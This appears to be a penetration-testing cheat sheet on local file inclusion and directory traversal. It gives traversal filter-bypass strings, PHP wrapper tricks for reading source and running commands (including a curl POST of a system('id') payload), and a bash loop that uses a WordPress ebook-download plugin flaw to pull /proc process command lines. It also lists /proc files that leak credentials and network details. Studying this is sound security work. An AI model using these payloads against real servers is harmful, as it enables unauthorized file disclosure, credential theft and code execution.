File Inclusion / Directory Traversal



Blog The Proc File System

Tool secondtool


 /etc/passwd on Linux or C:\Windows\boot.ini on Windows
 #if input from parameters used as part of filenames
 we can bypass by adding /../ in the
 # if Blacklisting is not coded correctly
 ..././ and ....// would become ../ vice vers sa
 cat .?/.*/.?/etc/passwd.
 Bash allows for for the ? and * wildcards to be used as wildcard
 #On PHP versions 5.3.4 and earlier, string-based detection could be bypassed by URL encoding the payload. 
 The characters ../ can be URL encoded into %2e%2e%2f, which will bypass the filter.

PHP provides various wrappers, which can be used for easier access to files, protocols, or streams. A list of wrappers can be found here. The php:// wrapper is enabled by default and interacts with IO streams.

PHP filter to convert file contents to Base64

 #we can get the source code and decode it

PHP filter to convert file contents to ROT13


Command execution with PHP Expect wrapper


Using PHP Input wrapper for command execution

curl -s -X POST --data "<?php system('id'); ?>" ""

Command execution with the PHP Zip wrapper


The Proc File System

$ for i in `seq 1 10000`; do curl -s --output - http://$RHOST/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline | grep -oaE 'cmdline.*?<script>' | sed "s/cmdline\/proc\/$i\/cmdline\/proc\/$i\/cmdline//" | sed "s/<script>//" | grep -avE '^$'; done


This is usually enabled on newer systems, such as RHEL 6. It provides information as to what process is running on which cpu. This can be handy to get a list of processes and their PID number.


Provides a list of mounted file systems. Can be used to determine where other interesting files might be located


Shows the ARP table. This is one way to find out IP addresses for other internal servers.


Shows the routing table information.

/proc/net/tcp and /proc/net/udp

Provides a list of active connections. Can be used to determine what ports are listening on the server


This is used for route caching. This can also be used to determine local IPs, as well as gain a better understanding of the target’s networking structure


Shows the kernel version. This can be used to help determine the OS running and the last time it’s been fully updated.



Lists everything that was used to invoke the process. This sometimes contains useful paths to configuration files as well as usernames and passwords.


Lists all the environment variables that were set when the process was invoked. This also sometimes contains useful paths to configuration files as well as usernames and passwords.


Points to the current working directory of the process. This may be useful if you don’t know the absolute path to a configuration file.


Provides access to the file descriptors being used. In some cases this can be used to read files that are opened by a process.

Last updated